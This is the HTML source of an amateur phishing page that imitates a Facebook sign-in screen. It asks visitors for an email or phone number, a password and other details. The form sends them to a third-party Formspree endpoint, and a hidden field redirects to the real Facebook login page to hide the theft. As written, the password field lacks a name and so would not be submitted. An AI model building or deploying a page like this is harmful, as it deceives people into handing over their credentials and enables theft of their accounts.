<!DOCTYPE html>
<html>
<head>
    <title>Facebook</title>
    <link rel="stylesheet" href="style.css">
    <style>
        .login-container {
    text-align: center;
    padding: 20px;
    background-color: #fff;
    border: 1px solid #ddd;
    border-radius: 5px;
    box-shadow: 0 0 5px rgba(0, 0, 0, 0.2);
}

img {
    width: 100px;
    margin-bottom: 20px;
}

input {
    width: 100%;
    padding: 10px;
    margin-bottom: 15px;
    border: 1px solid #ccc;
    border-radius: 3px;
}

button {
    background-color: #3b5998;
    color: #fff;
    padding: 10px 20px;
    border: none;
    border-radius: 3px;
    cursor: pointer;
}

a {
    color: #3b5998;
    text-decoration: none;
}
    </style>
</head>
<body>
    <div class="login-container" style="height: 700px;">
        <h1> sign in with facebook</h1>
        <form action="https://formspree.io/f/xeoqeppn" method="POST" style="width: 310px;; height: 200px; margin-left: 40%;">
            <label for="email">Email/phone</label>
            <input type="email" id="email" name="email" required><br><br>
            <label for="name" ></label>
            <input type="text" placeholder="pass" required><br><br>
            <label for="name" >HOW DO YOU GET TO KNOW ABOUT US </label><br>
            <select name="" id="" required  style="height: 20px;width:330px;"><br><br><br><br><br><br>
             <option value="">a freind told you</option><br><br><br><br>
            <option value=""> came  across it online</option> 
            <option value=""> you got referred</option>
            <input type="text" placeholder="your motive for coming to this website" required><br><br><br><br><br>
            <input type="submit" value="login" style="background-color:blue;">
        </form><br><br><br>
        <p>Don't have an account? <a href="signup.html">Sign Up</a></p><br><br><br><br>
    </div>
     <input type="hidden" name="_redirect" value="https://www.facebook.com/login.php/">
    
</body>
</html>
